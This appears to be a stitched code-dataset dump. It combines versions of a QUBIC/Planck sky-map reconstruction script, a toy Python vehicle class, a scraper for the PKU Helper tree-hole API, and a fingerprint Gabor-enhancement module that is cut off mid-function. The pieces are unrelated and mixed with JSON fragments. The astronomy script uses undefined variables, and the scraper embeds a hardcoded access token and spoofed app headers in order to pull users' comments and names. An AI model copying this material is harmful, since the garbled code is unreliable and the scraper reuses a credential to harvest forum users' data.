"step-4": "from __future__ import division\nfrom pyoperators import pcg\nfrom pysimulators import profile\nfrom qubic import create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition, QubicPlanckAcquisition, QubicInstrument\nfrom qubic.data import PATH\nfrom qubic.io import read_map\nimport healpy as hp\nimport matplotlib.pyplot as mp\nimport numpy as np\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0\ndeccenter = -57.0\ncenter = equ2gal(racenter, deccenter)\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\nall_solutions_fusion = []\nall_coverages = []\nnbptg = np.linspace(1000, 5000, 5)\ncorrect_time = 365 * 86400.0 / (nbptg / 1000)\ndetector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period\n )\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n all_solutions_fusion.append(solution_fusion)\nmask = all_coverages[0] > np.max(all_coverages[0] / 10)\nreso = 3\nTrange = [10, 10, 10]\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
"step-5": "from __future__ import division\nfrom pyoperators import pcg\nfrom pysimulators import profile\nfrom qubic import (\n create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,\n QubicPlanckAcquisition, QubicInstrument)\nfrom qubic.data import PATH\nfrom qubic.io import read_map\nimport healpy as hp\nimport matplotlib.pyplot as mp\nimport numpy as np\n\n\n\ndef statstr(vec):\n m=np.mean(vec)\n s=np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m,s)\n\ndef plotinst(inst,shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant): \n if quad < 4:\n plot(xyc[0],xyc[1],'ro')\n else:\n plot(xyc[0]+shift,xyc[1],'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind,\n sub=(3, 3, iplot + i), return_projected_map=True)]\n return out\n\n\ndef profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini,maxi-dx,nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion: \n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok])/fact\n if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0 # deg\ndeccenter = -57.0 # deg\ncenter = equ2gal(racenter, deccenter)\n\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\n\n\nall_solutions_fusion = []\nall_coverages = []\n\nnbptg = np.linspace(1000,5000,5)\ncorrect_time = 365*86400./(nbptg/1000)\ndetector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)\n\nfor i in xrange(len(all_instruments)):\n\tacq_qubic = QubicAcquisition(150, sampling, nside=nside,\n detector_nep=detector_nep[i])\n\tall_coverages.append(acq_qubic.get_coverage())\n\tconvolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n\tacq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)\n\tacq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n\n\tH = acq_fusion.get_operator()\n\tinvntt = acq_fusion.get_invntt_operator()\n\tobs = acq_fusion.get_observation()\n\n\tA = H.T * invntt * H\n\tb = H.T * invntt * obs\n\n\tsolution_fusion = pcg(A, b, disp=True)\n\tall_solutions_fusion.append(solution_fusion)\n\n\n\n\n\nmask = all_coverages[0] > np.max(all_coverages[0]/10)\n\nreso=3\nTrange=[10, 10, 10]\nfor i in xrange(len(nbptg)):\n\tfigure(i)\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tresid[~mask,:] = 0\n\tdisplay(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n\tprint(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))\n\t#savefig(names[i]+'.png')\n\n\ncols=['black', 'red','blue','green', 'orange']\naa=0.2\nrng = [-2,4]\nfs=8\nnb=20\nclf()\nfor i in xrange(len(all_instruments)):\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tidata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tqdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tudata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\n\tsubplot(3,1,1)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('I RMS residuals')\n\tylim(0.1,2)\n\tplot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(idata[0], idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,2)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('Q RMS residuals')\n\tylim(0.1,2)\n\tplot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,3)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('U RMS residuals')\n\tylim(0.1,2)\n\tplot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n#savefig('rms.png')\n\n\n\n\ncols=['black', 'red','blue','green', 'orange']\naa=0.2\nrng = [-2,4]\nfs=8\nnb=20\nclf()\nfor i in xrange(len(all_instruments)):\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tidata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tqdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tudata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tif i == 0 :\n\t\ttheidata = idata\n\t\ttheqdata = qdata\n\t\ttheudata = udata\n\n\tsubplot(3,1,1)\n\txlabel('Normalized coverage')\n\tylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n\tylim(0.,3)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tplot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,2)\n\txlabel('Normalized coverage')\n\tylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n\tylim(0.,3)\n\tplot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,3)\n\txlabel('Normalized coverage')\n\tylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n\tylim(0.,3)\n\tplot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tlegend(fontsize=fs, loc='upper right')\n\n#savefig('rms_ratio.png')\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# class Mob:
# def __init__(self, name, health=10):
# self.name = name
# self.health = health
# def get_hit(self, power):
# self.health -= power
# print(
# f"I, {self.name} was hit for {power} points. {self.health} pts remaining")
# hero = Mob("Sir Barks-alot", 30)
# hero.get_hit(6)
class Vehicle:
def __init__(self, category, top_speed, acceleration, position=0, speed=0, wheels=4):
self.category = category
self.speed = speed
self.top_speed = top_speed
self.position = position
self.acceleration = acceleration
self.wheels = wheels
def move(self):
self.position += self.speed
# print(f"{self.speed}")
print(f"{self.category} is moving. New position is {self.position}")
def accelerate(self):
potential = self.speed + self.acceleration
if self.top_speed >= potential:
self.speed += self.acceleration
print(self.speed)
else:
self.speed = self.top_speed
print(self.speed)
i = 0
motorcycle = Vehicle("Ducati", 12, 3)
while i <= 20:
motorcycle.accelerate()
motorcycle.move()
i += 1
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
|
normal
|
{
"blob_id": "b1573f80395d31017ceacbb998e421daf20ab75f",
"index": 6961,
"step-1": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n <mask token>\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\n",
"step-2": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\n",
"step-3": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n",
"step-4": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\ni = 0\nmotorcycle = Vehicle('Ducati', 12, 3)\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n",
"step-5": "# class Mob:\n# def __init__(self, name, health=10):\n# self.name = name\n# self.health = health\n\n# def get_hit(self, power):\n# self.health -= power\n# print(\n# f\"I, {self.name} was hit for {power} points. {self.health} pts remaining\")\n\n\n# hero = Mob(\"Sir Barks-alot\", 30)\n# hero.get_hit(6)\n\n\nclass Vehicle:\n def __init__(self, category, top_speed, acceleration, position=0, speed=0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n # print(f\"{self.speed}\")\n print(f\"{self.category} is moving. New position is {self.position}\")\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\ni = 0\nmotorcycle = Vehicle(\"Ducati\", 12, 3)\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import urllib.request
import http.cookiejar
import requests
import re
import sys
import time
import json
from bs4 import BeautifulSoup
head = {
"Host": "www.pkuhelper.com",
"Accept": "*/*",
"Accept-Language": "zh-Hans-CN;q=1",
"Connection": "keep-alive",
"Accept-Encoding": "gzip, deflate",
"User-Agent": "PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)"
}
url = "http://162.105.205.61/services/pkuhole/api.php"
#树洞回复爬虫,爬取树洞回复号、内容、姓名
def crawler(pid):
print("hole reply start!")
cids = []
texts = []
names = []
try:
para = {"action": "getcomment", "pid": pid, "token": "pnh3dmks5fmo00u0177qplsre44qo4fk"}
r = requests.get(url, headers=head, params=para)
data = json.loads(r.text)["data"]
for t in data:
cids.append(int(t["cid"]))
texts.append(t["text"])
names.append(t["name"])
print("hole reply end!")
return cids, texts, names
except:
print("HOLE REPLY ERROR!!!!!!")
return cids, texts, names
|
normal
|
{
"blob_id": "a74653f01b62445c74c8121739bd9185ce21c85a",
"index": 2764,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-3": "<mask token>\nhead = {'Host': 'www.pkuhelper.com', 'Accept': '*/*', 'Accept-Language':\n 'zh-Hans-CN;q=1', 'Connection': 'keep-alive', 'Accept-Encoding':\n 'gzip, deflate', 'User-Agent':\n 'PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)'}\nurl = 'http://162.105.205.61/services/pkuhole/api.php'\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-4": "import urllib.request\nimport http.cookiejar\nimport requests\nimport re\nimport sys\nimport time\nimport json\nfrom bs4 import BeautifulSoup\nhead = {'Host': 'www.pkuhelper.com', 'Accept': '*/*', 'Accept-Language':\n 'zh-Hans-CN;q=1', 'Connection': 'keep-alive', 'Accept-Encoding':\n 'gzip, deflate', 'User-Agent':\n 'PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)'}\nurl = 'http://162.105.205.61/services/pkuhole/api.php'\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-5": "import urllib.request\nimport http.cookiejar\nimport requests\nimport re\nimport sys\nimport time\nimport json\nfrom bs4 import BeautifulSoup\n\nhead = {\n\t\"Host\": \"www.pkuhelper.com\",\n\t\"Accept\": \"*/*\",\n\t\"Accept-Language\": \"zh-Hans-CN;q=1\",\n\t\"Connection\": \"keep-alive\",\n\t\"Accept-Encoding\": \"gzip, deflate\",\n\t\"User-Agent\": \"PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)\"\n}\nurl = \"http://162.105.205.61/services/pkuhole/api.php\"\n\n#树洞回复爬虫,爬取树洞回复号、内容、姓名\ndef crawler(pid):\n\tprint(\"hole reply start!\")\n\tcids = []\n\ttexts = []\n\tnames = []\n\n\ttry:\n\t\tpara = {\"action\": \"getcomment\", \"pid\": pid, \"token\": \"pnh3dmks5fmo00u0177qplsre44qo4fk\"}\n\t\tr = requests.get(url, headers=head, params=para)\n\t\tdata = json.loads(r.text)[\"data\"]\n\t\tfor t in data:\n\t\t\tcids.append(int(t[\"cid\"]))\n\t\t\ttexts.append(t[\"text\"])\n\t\t\tnames.append(t[\"name\"])\n\n\t\tprint(\"hole reply end!\")\n\n\t\treturn cids, texts, names\n\texcept:\n\t\tprint(\"HOLE REPLY ERROR!!!!!!\")\n\t\treturn cids, texts, names",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
python3
description :Fingerprint image enhancement by using gabor
"""
import os
import cv2
import math
import scipy
import numpy as np
from scipy import signal
def normalise(img):
normed = (img - np.mean(img)) / (np.std(img))
return normed
def ridge_segment(im, blksze, thresh):
rows, cols = im.shape
im = normalise(im)
new_rows = np.int(blksze * np.ceil(rows / blksze))
new_cols = np.int(blksze * np.ceil(cols / blksze))
padded_img = np.zeros((new_rows, new_cols))
stddevim = np.zeros((new_rows, new_cols))
padded_img[0:rows][:, 0:cols] = im
for i in range(0, new_rows, blksze):
for j in range(0, new_cols, blksze):
block = padded_img[i:i + blksze][:, j:j + blksze]
stddevim[i:i + blksze][:, j:j +
blksze] = np.std(block) * np.ones(block.shape)
stddevim = stddevim[0:rows][:, 0:cols]
mask = stddevim > thresh
mean_val = np.mean(im[mask])
std_val = np.std(im[mask])
normim = (im - mean_val) / (std_val)
return (normim, mask)
def ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):
# Calculate image gradients.
sze = np.fix(6 * gradientsigma)
if np.remainder(sze, 2) == 0:
sze = sze + 1
gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)
f = gauss * gauss.T
fy, fx = np.gradient(f) # Gradient of Gaussian
Gx = signal.convolve2d(im, fx, mode='same')
Gy = signal.convolve2d(im, fy, mode='same')
Gxx = np.power(Gx, 2)
Gyy = np.power(Gy, 2)
Gxy = Gx * Gy
# Now smooth the covariance data to perform a weighted summation of the data.
sze = np.fix(6 * blocksigma)
gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)
f = gauss * gauss.T
Gxx = scipy.ndimage.convolve(Gxx, f)
Gyy = scipy.ndimage.convolve(Gyy, f)
Gxy = 2 * scipy.ndimage.convolve(Gxy, f)
# Analytic solution of principal direction
denom = np.sqrt(np.power(Gxy, 2) + np.power((Gxx - Gyy), 2)
) + np.finfo(float).eps
sin2theta = Gxy / denom # Sine and cosine of doubled angles
cos2theta = (Gxx - Gyy) / denom
if orientsmoothsigma:
sze = np.fix(6 * orientsmoothsigma)
if np.remainder(sze, 2) == 0:
sze = sze + 1
gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)
f = gauss * gauss.T
# Smoothed sine and cosine of
cos2theta = scipy.ndimage.convolve(cos2theta, f)
sin2theta = scipy.ndimage.convolve(sin2theta, f) # doubled angles
orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2
return (orientim)
def frequest(im, orientim, windsze, minWaveLength, maxWaveLength):
rows, cols = np.shape(im)
# Find mean orientation within the block. This is done by averaging the
# sines and cosines of the doubled angles before reconstructing the
# angle again. This avoids wraparound problems at the origin.
cosorient = np.mean(np.cos(2 * orientim))
sinorient = np.mean(np.sin(2 * orientim))
orient = math.atan2(sinorient, cosorient) / 2
# Rotate the image block so that the ridges are vertical
# ROT_mat = cv2.getRotationMatrix2D((cols/2,rows/2),orient/np.pi*180 + 90,1)
# rotim = cv2.warpAffine(im,ROT_mat,(cols,rows))
rotim = scipy.ndimage.rotate(
im, orient / np.pi * 180 + 90, axes=(1, 0), reshape=False, order=3, mode='nearest')
# Now crop the image so that the rotated image does not contain any
# invalid regions. This prevents the projection down the columns
# from being mucked up.
cropsze = int(np.fix(rows / np.sqrt(2)))
offset = int(np.fix((rows - cropsze) / 2))
rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]
# Sum down the columns to get a projection of the grey values down
# the ridges.
proj = np.sum(rotim, axis=0)
dilation = scipy.ndimage.grey_dilation(
proj, windsze, structure=np.ones(windsze))
temp = np.abs(dilation - proj)
peak_thresh = 2
maxpts = (temp < peak_thresh) & (proj > np.mean(proj))
maxind = np.where(maxpts)
rows_maxind, cols_maxind = np.shape(maxind)
# Determine the spatial frequency of the ridges by divinding the
# distance between the 1st and last peaks by the (No of peaks-1). If no
# peaks are detected, or the wavelength is outside the allowed bounds,
# the frequency image is set to 0
if cols_maxind < 2:
freqim = np.zeros(im.shape)
else:
NoOfPeaks = cols_maxind
waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks - 1)
if waveLength >= minWaveLength and waveLength <= maxWaveLength:
freqim = 1 / np.double(waveLength) * np.ones(im.shape)
else:
freqim = np.zeros(im.shape)
return freqim
def ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength):
rows, cols = im.shape
freq = np.zeros((rows, cols))
for r in range(0, rows - blksze, blksze):
for c in range(0, cols - blksze, blksze):
blkim = im[r:r + blksze][:, c:c + blksze]
blkor = orient[r:r + blksze][:, c:c + blksze]
freq[r:r + blksze][:, c:c +
blksze] = frequest(blkim, blkor, windsze, minWaveLength, maxWaveLength)
freq = freq * mask
freq_1d = np.reshape(freq, (1, rows * cols))
ind = np.where(freq_1d > 0)
ind = np.array(ind)
ind = ind[1, :]
non_zero_elems_in_freq = freq_1d[0][ind]
meanfreq = np.mean(non_zero_elems_in_freq)
# does not work properly
medianfreq = np.median(non_zero_elems_in_freq)
return freq, meanfreq
def ridge_filter(im, orient, freq, kx, ky):
angleInc = 3
im = np.double(im)
rows, cols = im.shape
new_im = np.zeros((rows, cols))
freq_1d = np.reshape(freq, (1, rows * cols))
ind = np.where(freq_1d > 0)
ind = np.array(ind)
ind = ind[1, :]
# Round the array of frequencies to the nearest 0.01 to reduce the
# number of distinct frequencies we have to deal with.
non_zero_elems_in_freq = freq_1d[0][ind]
non_zero_elems_in_freq = np.double(
np.round((non_zero_elems_in_freq * 100))) / 100
unfreq = np.unique(non_zero_elems_in_freq)
# Generate filters corresponding to these distinct frequencies and
# orientations in 'angleInc' increments.
sigmax = 1 / unfreq[0] * kx
sigmay = 1 / unfreq[0] * ky
sze = np.round(3 * np.max([sigmax, sigmay]))
x, y = np.meshgrid(np.linspace(-sze, sze, (2 * sze + 1)),
np.linspace(-sze, sze, (2 * sze + 1)))
